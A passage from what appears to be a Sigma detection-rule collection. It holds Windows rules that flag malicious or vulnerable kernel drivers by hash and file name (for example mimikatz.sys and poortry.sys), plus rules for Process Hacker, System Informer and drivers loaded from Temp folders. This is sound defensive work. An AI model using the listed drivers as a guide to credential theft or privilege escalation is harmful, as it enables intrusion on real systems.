'SHA256=10ad50fcb360dcab8539ea322aaf2270565dc835b7535790937348523d723d6b'\n            - 'SHA256=c4f041de66ec8cc5ab4a03bbc46f99e073157a4e915a9ab4069162de834ffc5c'\n            - 'SHA256=139f8412a7c6fdc43dcfbbcdba256ee55654eb36a40f338249d5162a1f69b988'\n            - 'SHA256=793b78e70b3ae3bb400c5a8bc4d2d89183f1d7fc70954aed43df7287248b6875'\n            - 'SHA256=492113a223d6a3fc110059fe46a180d82bb8e002ef2cd76cbf0c1d1eb8243263'\n            - 'SHA256=b34e2d9f3d4ef59cf7af18e17133a6a06509373e69e33c8eecb2e30501d0d9e4'\n            - 'SHA256=f936ec4c8164cbd31add659b61c16cb3a717eac90e74d89c47afb96b60120280'\n            - 'SHA256=60ee78a2b070c830fabb54c6bde0d095dff8fad7f72aa719758b3c41c72c2aa9'\n            - 'SHA256=c8ae217860f793fce3ad0239d7b357dba562824dd7177c9d723ca4d4a7f99a12'\n            - 'SHA256=29348ebe12d872c5f40e316a0043f7e5babe583374487345a79bad0ba93fbdfe'\n            - 'SHA256=5f6fec8f7890d032461b127332759c88a1b7360aa10c6bd38482572f59d2ba8b'\n            - 'SHA256=e8ec06b1fa780f577ff0e8c713e0fd9688a48e0329c8188320f9eb62dfc0667f'\n            - 'SHA256=770f33259d6fb10f4a32d8a57d0d12953e8455c72bb7b60cb39ce505c507013a'\n            - 'SHA256=b0b80a11802b4a8ca69c818a03e76e7ef57c2e293de456439401e8e6073f8719'\n            - 'SHA256=bc49cb96f3136c3e552bf29f808883abb9e651040415484c1736261b52756908'\n            - 'SHA256=4c89c907b7525b39409af1ad11cc7d2400263601edafc41c935715ef5bd145de'\n            - 'SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc'\n            - 'SHA256=200f98655d1f46d2599c2c8605ebb7e335fee3883a32135ca1a81e09819bc64a'\n            - 'SHA256=b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427'\n            - 'SHA256=673bbc7fa4154f7d99af333014e888599c27ead02710f7bc7199184b30b38653'\n            - 'SHA256=4b97d63ebdeda6941bb8cef5e94741c6cca75237ca830561f2262034805f0919'\n            - 'SHA256=d50cb5f4b28c6c26f17b9d44211e515c3c0cc2c0c4bf24cd8f9ed073238053ad'\n            - 'SHA256=62764ddc2dce74f2620cd2efd97a2950f50c8ac5a1f2c1af00dc5912d52f6920'\n            - 'SHA256=6994b32e3f3357f4a1d0abe81e8b62dd54e36b17816f2f1a80018584200a1b77'\n            - 'SHA256=751e9376cb7cb9de63e1808d43579d787d3f6d659173038fe44a2d7fdb4fd17e'\n            - 'SHA256=87565ff08a93a8ff41ea932bf55dec8e0c7e79aba036507ea45df9d81cb36105'\n            - 'SHA256=2da2b883e48e929f5365480d487590957d9e6582cc6da2c0b42699ba85e54fe2'\n            - 'SHA256=627e13da6a45006fff4711b14754f9ccfac9a5854d275da798a22f3a68dd1eaa'\n            - 'SHA256=94ba4bcbdb55d6faf9f33642d0072109510f5c57e8c963d1a3eb4f9111f30112'\n            - 'SHA256=704c6ffe786bc83a73fbdcd2edd50f47c3b5053da7da6aa4c10324d389a31db4'\n            - 'SHA256=d41e39215c2c1286e4cd3b1dc0948adefb161f22bc3a78756a027d41614ee4ff'\n            - 'SHA256=0f7bfa10075bf5c193345866333d415509433dbfe5a7d45664b88d72216ff7c3'\n            - 'SHA256=14b89298134696f2fd1b1df0961d36fa6354721ea92498a349dc421e79447925'\n            - 'SHA256=3b2cd65a4fbdd784a6466e5196bc614c17d1dbaed3fd991d242e3be3e9249da6'\n            - 'SHA256=2ce4f8089b02017cbe86a5f25d6bc69dd8b6f5060c918a64a4123a5f3be1e878'\n            - 'SHA256=e99580e25f419b5ad90669e0c274cf63d30efa08065d064a863e655bdf77fb59'\n            - 'SHA256=a74e8f94d2c140646a8bb12e3e322c49a97bd1b8a2e4327863d3623f43d65c66'\n            - 'SHA256=47356707e610cfd0be97595fbe55246b96a69141e1da579e6f662ddda6dc5280'\n            - 'SHA256=18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7'\n            - 'SHA256=95e5b5500e63c31c6561161a82f7f9373f99b5b1f54b018c4866df4f2a879167'\n            - 'SHA256=5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a'\n            - 'SHA256=82b7fa34ad07dbf9afa63b2f6ed37973a1b4fe35dee90b3cf5c788c15c9f08f7'\n            - 'SHA256=a85d3fd59bb492a290552e5124bfe3f9e26a3086d69d42ccc44737b5a66673ec'\n            - 'SHA256=ea50f22daade04d3ca06dedb497b905215cba31aae7b4cab4b533fda0c5be620'\n            - 'SHA256=d032001eab6cad4fbef19aab418650ded00152143bd14507e17d62748297c23f'\n            - 'SHA256=4d42678df3917c37f44a1506307f1677b9a689efcf350b1acce7e6f64b514905'\n            - 'SHA256=30061ef383e18e74bb067fbca69544f1a7544e8dc017d4e7633d8379aff4c3c3'\n            - 'SHA256=7433f14b40c674c5e87b6210c330d5bcaf2f6f52d632ae29e9b7cf3ca405665b'\n            - 'SHA256=818787057fc60ac8b957aa37d750aa4bace8e6a07d3d28b070022ee6dcd603ab'\n            - 'SHA256=c4fb31e3f24e40742a1b9855a2d67048fe64b26d8d2dbcec77d2d5deeded2bcc'\n            - 'SHA256=5295080de37d4838e15dec4e3682545033d479d3d9ac28d74747c086559fb968'\n            - 'SHA256=7824931e55249a501074a258b4f65cd66157ee35672ba17d1c0209f5b0384a28'\n            - 'SHA256=07759750fbb93c77b5c3957c642a9498fcff3946a5c69317db8d6be24098a4a0'\n            - 'SHA256=51805bb537befaac8ce28f2221624cb4d9cefdc0260bc1afd5e0bc97bf1f9f93'\n            - 'SHA256=e6f764c3b5580cd1675cbf184938ad5a201a8c096607857869bd7c3399df0d12'\n            - 'SHA256=2faf95a3405578d0e613c8d88d534aa7233da0a6217ce8475890140ab8fb33c8'\n            - 'SHA256=af4f42197f5ce2d11993434725c81ecb6f54025110dedf56be8ffc0e775d9895'\n            - 'SHA256=baf7fbc4743a81eb5e4511023692b2dfdc32ba670ba3e4ed8c09db7a19bd82d3'\n            - 'SHA256=a42f4ae69b8755a957256b57eb3d319678eab81705f0ffea0d649ace7321108f'\n            - 'SHA256=4bca0a401b364a5cc1581a184116c5bafa224e13782df13272bc1b748173d1be'\n            - 'SHA256=e4b2c0aa28aac5e197312a061b05363e2e0387338b28b23272b5b6659d29b1d8'\n            - 'SHA256=69866557566c59772f203c11f5fba30271448e231b65806a66e48f41e3804d7f'\n            - 'SHA256=93aa3066ae831cdf81505e1bc5035227dc0e8f06ebbbb777832a17920c6a02fe'\n            - 'SHA256=bed4285d0f8d18f17ddaa53a98a475c87c04c4d167499e24c770da788e5d45f4'\n            - 'SHA256=fa9abb3e7e06f857be191a1e049dd37642ec41fb2520c105df2227fcac3de5d5'\n            - 'SHA256=07beac65e28ee124f1da354293a3d6ad7250ed1ce29b8342acfd22252548a5af'\n            - 'SHA256=9a67626fb468d3f114c23ac73fd8057f43d06393d3eca04da1d6676f89da2d40'\n            - 'SHA256=7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6'\n            - 'SHA256=7a84703552ae032a0d1699a081e422ed6c958bbe56d5b41839c8bfa6395bee1d'\n            - 'SHA256=ddf427ce55b36db522f638ba38e34cd7b96a04cb3c47849b91e7554bfd09a69a'\n            - 'SHA256=64d4370843a07e25d4ceb68816015efcaeca9429bb5bb692a88e615b48c7da96'\n            - 'SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497'\n            - 'SHA256=fefc070a5f6a9c0415e1c6f44512a33e8d163024174b30a61423d00d1e8f9bf2'\n            - 'SHA256=8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce'\n            - 'SHA256=d43520128871c83b904f3136542ea46644ac81a62d51ae9d3c3a3f32405aad96'\n            - 'SHA256=efa56907b9d0ec4430a5d581f490b6b9052b1e979da4dab6a110ab92e17d4576'\n            - 'SHA256=1d23ab46ad547e7eef409b40756aae9246fbdf545d13946f770643f19c715e80'\n            - 'SHA256=62036cdf3663097534adf3252b921eed06b73c2562655eae36b126c7d3d83266'\n            - 'SHA256=6661320f779337b95bbbe1943ee64afb2101c92f92f3d1571c1bf4201c38c724'\n            - 'SHA256=3033ff03e6f523726638b43d954bc666cdd26483fa5abcf98307952ff88f80ee'\n            - 'SHA256=6964a5d85639baee288555797992861232e75817f93028b50b8c6d34aa38b05b'\n            - 'SHA256=06c5ebd0371342d18bc81a96f5e5ce28de64101e3c2fd0161d0b54d8368d2f1f'\n            - 'SHA256=1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e'\n            - 'SHA256=6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1'\n            - 'SHA256=deade507504d385d8cae11365a2ac9b5e2773ff9b61624d75ffa882d6bb28952'\n            - 'SHA256=c42c1e5c3c04163bf61c3b86b04a5ec7d302af7e254990cef359ac80474299da'\n            - 'SHA256=8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e'\n            - 'SHA256=88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463'\n            - 'SHA256=b0f1fbadc1d7a77557d3d836f7698bd986a3ec9fc5d534ad3403970f071176f7'\n            - 'SHA256=bcb774b6f6ff504d2db58096601bc5cb419c169bfbeaa3af852417e87d9b2aa0'\n            - 'SHA256=4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1'\n            - 'SHA256=82b0e1d7a27b67f0e6dc39dc41e880bdaef5d1f69fcec38e08da2ed78e805ef9'\n            - 'SHA256=ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a'\n            - 'SHA256=443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85'\n            - 'SHA256=f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac'\n            - 'SHA256=0181d60506b1f3609217487c2c737621d637e1232f243f68c662d045f44d4873'\n            - 'SHA256=c13f5bc4edfbe8f1884320c5d76ca129d00de41a1e61d45195738f125dfe60a7'\n            - 'SHA256=8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38'\n            - 'SHA256=c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c'\n            - 'SHA256=d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c'\n            - 'SHA256=1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524'\n            - 'SHA256=9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51'\n            - 'SHA256=bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df'\n            - 'SHA256=94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601'\n            - 'SHA256=6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7'\n            - 'SHA256=80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3'\n            - 'SHA256=e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19'\n            - 'SHA256=ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55'\n            - 'SHA256=8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe'\n            - 'SHA256=4f02aed3750bc6a924c75e774404f259f721d8f4081ed68aa01cf73ca5430f85'\n            - 'SHA256=81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1'\n            - 'SHA256=0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06'\n            - 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c'\n            - 'SHA256=b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3'\n            - 'SHA256=26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55'\n            - 'SHA256=a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778'\n            - 'SHA256=d25b5e4d07f594c640dcd93cfc8ab3f0a38348150bd0bfae89f404fbb0d811c6'\n            - 'SHA256=1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6'\n            - 'SHA256=083a311875173f8c4653e9bbbabb689d14aa86b852e7fa9f5512fc60e0fd2c43'\n            - 'SHA256=89698cad598a56f9e45efffd15d1841e494a2409cc12279150a03842cd6bb7f3'\n            - 'SHA256=a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7'\n            - 'SHA256=02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715'\n            - 'SHA256=8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434'\n            - 'SHA256=ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0'\n            - 'SHA256=41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f'\n            - 'SHA256=42ff11ddb46dfe5fa895e7babf88ee27790cde53a9139fc384346a89e802a327'\n            - 'SHA256=36f45a42ebf2de6962db92aaf8845d7f9fd6895bedc31422adcf31c59a79602d'\n            - 'SHA256=4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021'\n            - 'SHA256=4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4'\n            - 'SHA256=e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15'\n            - 'SHA256=f0474e76cfd36e37e32cfe5c0a9e05ddee17dd5014d7aa8817ea3634a3540a3f'\n            - 'SHA256=a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2'\n            - 'SHA256=52d5c35325ce701516f8b04380c9fbdb78ec6bcc13b444f758fdb03d545b0677'\n            - 'SHA256=e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d'\n            - 'SHA256=7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d'\n            - 'SHA256=24c900024d213549502301c366d18c318887630f04c96bf0a3d6ba74e0df164f'\n            - 'SHA256=b7956e31c2fcc0a84bcedf30e5f8115f4e74eed58916253a0c05c8be47283c57'\n            - 'SHA256=96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc'\n            - 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c'\n            - 'SHA256=0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35'\n            - 'SHA256=888491196bd8ff528b773a3e453eae49063ad31fb4ca0f9f2e433f8d35445440'\n            - 'IMPHASH=8d070a93a45ed8ba6dba6bfbe0d084e7'\n            - 'IMPHASH=7641a0c227f0a3a45b80bb8af43cd152'\n            - 'IMPHASH=7df0d3ee663fc0e7c72a95e44ba4c82c'\n            - 'IMPHASH=70e1caa5a322b56fd7951f1b2caacb0d'\n            - 'IMPHASH=beceab354c66949088c9e5ed1f1ff2a4'\n            - 'IMPHASH=caa08a0ba5f679b1e5bbae747cb9d626'\n            - 'IMPHASH=420625b024fba72a24025defdf95b303'\n            - 'IMPHASH=65ccc2c578a984c31880b6c5e65257d3'\n            - 'IMPHASH=e717abe060bc5c34925fe3120ac22f45'\n            - 'IMPHASH=41113a3a832353963112b94f4635a383'\n            - 'IMPHASH=3866dd9fe63de457bdbf893bf7050ddf'\n            - 'IMPHASH=3fd33d5b3b52e2db91983ac4b1d7a3c4'\n            - 'IMPHASH=a998fe47a44bfbf2399968e21cfdf7ca'\n            - 'IMPHASH=c9a6e83d931286d1604d1add8403e1e5'\n            - 'IMPHASH=cf0eb2dce2ba2c9ff5dd0da794b8b372'\n            - 'IMPHASH=ea37e43ffc7cfcba181c5cff37a9be1f'\n            - 'IMPHASH=8e35c9460537092672b3c7c14bccc7e0'\n            - 'IMPHASH=7bf14377888c429897eb10a85f70266c'\n            - 'IMPHASH=b351627263648b1d220bb488e7ec7202'\n            - 'IMPHASH=ce10082e1aa4c1c2bd953b4a7208e56a'\n            - 'IMPHASH=a7bd820fa5b895fab06f20739c9f24b8'\n            - 'IMPHASH=be0dd8b8e045356d600ee55a64d9d197'\n            - 'IMPHASH=63fd1582ac2edee50f7ec7eedde38ee8'\n            - 'IMPHASH=6c8d5c79a850eecc2fb0291cebda618d'\n            - 'IMPHASH=c32d9a9af7f702814e1368c689877f3a'\n            - 'IMPHASH=6b387c029257f024a43a73f38afb2629'\n            - 'IMPHASH=df43355c636583e56e92142dcc69cc58'\n            - 'IMPHASH=e3ee9131742bf9c9d43cb9a425e497dd'\n            - 'IMPHASH=c214aac08575c139e48d04f5aee21585'\n            - 'IMPHASH=3c5d2ffd06074f1b09c89465cc8bfbf7'\n            - 'IMPHASH=059c6bd84285f4960e767f032b33f19b'\n            - 'IMPHASH=a09170ef09c55cdca9472c02cb1f2647'\n            - 'IMPHASH=fca0f3c7b6d79f494034b9d2a1f5921a'\n            - 'IMPHASH=0262d4147f21d681f8519ab2af79283f'\n            - 'IMPHASH=832219eb71b8bdb771f1d29d27b0acf4'\n            - 'IMPHASH=514298d18002920ee5a917fc34426417'\n            - 'IMPHASH=26ceec6572c630bdad60c984e51b7da4'\n            - 'IMPHASH=dbf09dd3e675f15c7cc9b4d2b8e6cd90'\n            - 'IMPHASH=4b47f6031c558106eee17655f8f8a32f'\n            - 'IMPHASH=a6c4a7369500900fc172f9557cff22cf'\n            - 'IMPHASH=3b49942ec6cef1898e97f741b2b5df8a'\n            - 'IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511'\n            - 'IMPHASH=27f6dc8a247a22308dd1beba5086b302'\n            - 'IMPHASH=7d017945bf90936a6c40f73f91ed02c2'\n            - 'IMPHASH=d51f0f6034eb5e45f0ed4e9b7bbc9c97'\n            - 'IMPHASH=0ad7da35304c75ccf859bc29fe9ed09e'\n            - 'IMPHASH=bf9d32a6ab9effcd2fd6a734e5be98f9'\n            - 'IMPHASH=87fd2b54ed568e2294300e164b8c46f7'\n            - 'IMPHASH=2de3451f3e7b02970582bb8f9fd8c73a'\n            - 'IMPHASH=e97dc162f416bf06745bf9ffdf78a0ff'\n            - 'IMPHASH=2a008187d4a73284ddcc43f1b727b513'\n            - 'IMPHASH=f8e4844312e81dbdb4e8e95e2ad2c127'\n            - 'IMPHASH=4c7cc13a110ccdbb932bb9d7d42efdf4'\n            - 'IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4'\n            - 'IMPHASH=3db9de43d5d530c10d0cd2d43c7a0771'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_mal_drivers_names.yml",
    "content": "title: Malicious Driver Load By Name\nid: 39b64854-5497-4b57-a448-40977b8c9679\nstatus: test\ndescription: Detects loading of known malicious drivers via the file name of the drivers.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-03\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\wfshbr64.sys'\n            - '\\ktmutil7odm.sys'\n            - '\\ktes.sys'\n            - '\\a26363e7b02b13f2b8d697abb90cd5c3.sys'\n            - '\\kt2.sys'\n            - '\\4748696211bd56c2d93c21cab91e82a5.sys'\n            - '\\malicious.sys'\n            - '\\a236e7d654cd932b7d11cb604629a2d0.sys'\n            - '\\spwizimgvt.sys'\n            - '\\c94f405c5929cfcccc8ad00b42c95083.sys'\n            - '\\fur.sys'\n            - '\\wantd.sys'\n            - '\\windbg.sys'\n            - '\\4118b86e490aed091b1a219dba45f332.sys'\n            - '\\gmer64.sys'\n            - '\\1fc7aeeff3ab19004d2e53eae8160ab1.sys'\n            - '\\poortry2.sys'\n            - '\\wintapix.sys'\n            - '\\daxin_blank6.sys'\n            - '\\6771b13a53b9c7449d4891e427735ea2.sys'\n            - '\\blacklotus_driver.sys'\n            - '\\air_system10.sys'\n            - '\\dkrtk.sys'\n            - '\\7.sys'\n            - '\\sense5ext.sys'\n            - '\\ktgn.sys'\n            - '\\ndislan.sys'\n            - '\\nlslexicons0024uvn.sys'\n            - '\\be6318413160e589080df02bb3ca6e6a.sys'\n            - '\\4.sys'\n            - '\\wantd_2.sys'\n            - '\\e29f6311ae87542b3d693c1f38e4e3ad.sys'\n            - '\\daxin_blank3.sys'\n            - '\\gftkyj64.sys'\n            - '\\daxin_blank2.sys'\n            - '\\wantd_4.sys'\n            - '\\reddriver.sys'\n            - '\\834761775.sys'\n            - '\\mlgbbiicaihflrnh.sys'\n            - '\\mjj0ge.sys'\n            - '\\daxin_blank.sys'\n            - '\\daxin_blank5.sys'\n            - '\\poortry1.sys'\n            - '\\msqpq.sys'\n            - '\\mimidrv.sys'\n            - '\\e939448b28a4edc81f1f974cebf6e7d2.sys'\n            - '\\prokiller64.sys'\n            - '\\nodedriver.sys'\n            - '\\wantd_3.sys'\n            - '\\lctka.sys'\n            - '\\kapchelper_x64.sys'\n            - '\\daxin_blank4.sys'\n            - '\\a9df5964635ef8bd567ae487c3d214c4.sys'\n            - '\\wantd_6.sys'\n            - '\\ntbios.sys'\n            - '\\wantd_5.sys'\n            - '\\pciecubed.sys'\n            - '\\mimikatz.sys'\n            - '\\nqrmq.sys'\n            - '\\2.sys'\n            - '\\poortry.sys'\n            - '\\ntbios_2.sys'\n            - '\\fgme.sys'\n            - '\\telephonuafy.sys'\n            - '\\typelibde.sys'\n            - '\\daxin_blank1.sys'\n            - '\\ef0e1725aaf0c6c972593f860531a2ea.sys'\n            - '\\5a4fe297c7d42539303137b6d75b150d.sys'\n    condition: selection\nfalsepositives:\n    - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.\n    - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_pua_process_hacker.yml",
    "content": "title: PUA - Process Hacker Driver Load\nid: 67add051-9ee7-4ad3-93ba-42935615ae8d\nrelated:\n    - id: 10cb6535-b31d-4512-9962-513dcbc42cc1\n      type: similar\nstatus: test\ndescription: Detects driver load of the Process Hacker tool\nreferences:\n    - https://processhacker.sourceforge.io/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-16\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - cve.2021-21551\n    - attack.t1543\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\kprocesshacker.sys'\n        - Hashes|contains:\n              - 'IMPHASH=821D74031D3F625BCBD0DF08B70F1E77'\n              - 'IMPHASH=F86759BB4DE4320918615DC06E998A39'\n              - 'IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18'\n              - 'IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0'\n    condition: selection\nfalsepositives:\n    - Legitimate use of process hacker or system informer by developers or system administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_pua_system_informer.yml",
    "content": "title: PUA - System Informer Driver Load\nid: 10cb6535-b31d-4512-9962-513dcbc42cc1\nrelated:\n    - id: 67add051-9ee7-4ad3-93ba-42935615ae8d\n      type: similar\nstatus: test\ndescription: Detects driver load of the System Informer tool\nreferences:\n    - https://systeminformer.sourceforge.io/\n    - https://github.com/winsiderss/systeminformer\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-08\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\SystemInformer.sys'\n        - Hashes|contains:\n              - 'SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24'\n              - 'SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454'\n              - 'SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D'\n              - 'SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B'\n              - 'SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D'\n              - 'SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34'\n              - 'SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89'\n              - 'SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB'\n              - 'SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B'\n              - 'SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97'\n              - 'SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656'\n              - 'SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4'\n              - 'SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138'\n    condition: selection\nfalsepositives:\n    - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_susp_temp_use.yml",
    "content": "title: Driver Load From A Temporary Directory\nid: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75\nstatus: test\ndescription: Detects a driver load from a temporary directory\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-12\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: '\\Temp\\'\n    condition: selection\nfalsepositives:\n    - There is a relevant set of false positives depending on applications in the environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_drivers.yml",
    "content": "title: Vulnerable Driver Load\nid: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8\nstatus: test\ndescription: Detects loading of known vulnerable drivers via their hash.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-18\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        Hashes|contains:\n            - 'MD5=c996d7971c49252c582171d9380360f2'\n            - 'MD5=da7e98b23b49b7293ee06713032c74f6'\n            - 'MD5=9496585198d726000ea505abc39dbfe9'\n            - 'MD5=649ff59b8e571c1fc6535b31662407aa'\n            - 'MD5=4429f85e2415742c7cf8c9f54905c4b9'\n            - 'MD5=a610cd4c762b5af8575285dafb9baa8f'\n            - 'MD5=d5e76d125d624f8025d534f49e3c4162'\n            - 'MD5=9c8fffef24fc480917236f9a20b80a47'\n            - 'MD5=65b979bcab915c3922578fe77953d789'\n            - 'MD5=598f8fb2317350e5f90b7bd16baf5738'\n            - 'MD5=6691e873354f1914692df104718eebad'\n            - 'MD5=4814205270caa80d35569eee8081838e'\n            - 'MD5=7f9128654c3def08c28e0e13efff0fee'\n            - 'MD5=ce952204558ea66ec1a9632dcbdde8bd'\n            - 'MD5=0c0195c48b6b8582fa6f6373032118da'\n            - 'MD5=370a4ca29a7cf1d6bc0744afc12b236c'\n            - 'MD5=67e03f83c503c3f11843942df32efe5a'\n            - 'MD5=8a70921638ff82bb924456deadcd20e6'\n            - 'MD5=8a212a246b3c41f3ddce5888aaaaacd6'\n            - 'MD5=a346417e9ae2c17a8fbf73302eeb611d'\n            - 'MD5=d4f7c14e92b36c341c41ae93159407dd'\n            - 'MD5=748cf64b95ca83abc35762ad2c25458f'\n            - 'MD5=79ab228766c76cfdf42a64722821711e'\n            - 'MD5=ce67e51b8c0370d1bfe421b79fa8b656'\n            - 'MD5=25190f667f31318dd9a2e36383d5709f'\n            - 'MD5=1f263a57c5ef46c8577744ecb32c9548'\n            - 'MD5=c6cfa2d6e4c443e673c2c12417ea3001'\n            - 'MD5=cceb3a7e3bd0203c807168b393a65a74'\n            - 'MD5=56b54823a79a53747cbe11f8c4db7b1e'\n            - 'MD5=988dabdcf990b134b0ac1e00512c30c4'\n            - 'MD5=09e77d71d626574e6142894caca6e6dd'\n            - 'MD5=c832a4313ff082258240b61b88efa025'\n            - 'MD5=44499d3cab387aa78a4a6eca2ac181fb'\n            - 'MD5=6ff59faea912903af0ba8e80e58612bc'\n            - 'MD5=7461f0f9b931044a9d5f1d44eb4e8e09'\n            - 'MD5=08bac71557df8a9b1381c8c165f64520'\n            - 'MD5=fea9319d67177ed6f36438d2bd9392fb'\n            - 'MD5=6dd82d91f981893be57ff90101a7f7f1'\n            - 'MD5=d4119a5cb07ce945c6549eae74e39731'\n            - 'MD5=cf1113723e3c1c71af80d228f040c198'\n            - 'MD5=0e625b7a7c3f75524e307b160f8db337'\n            - 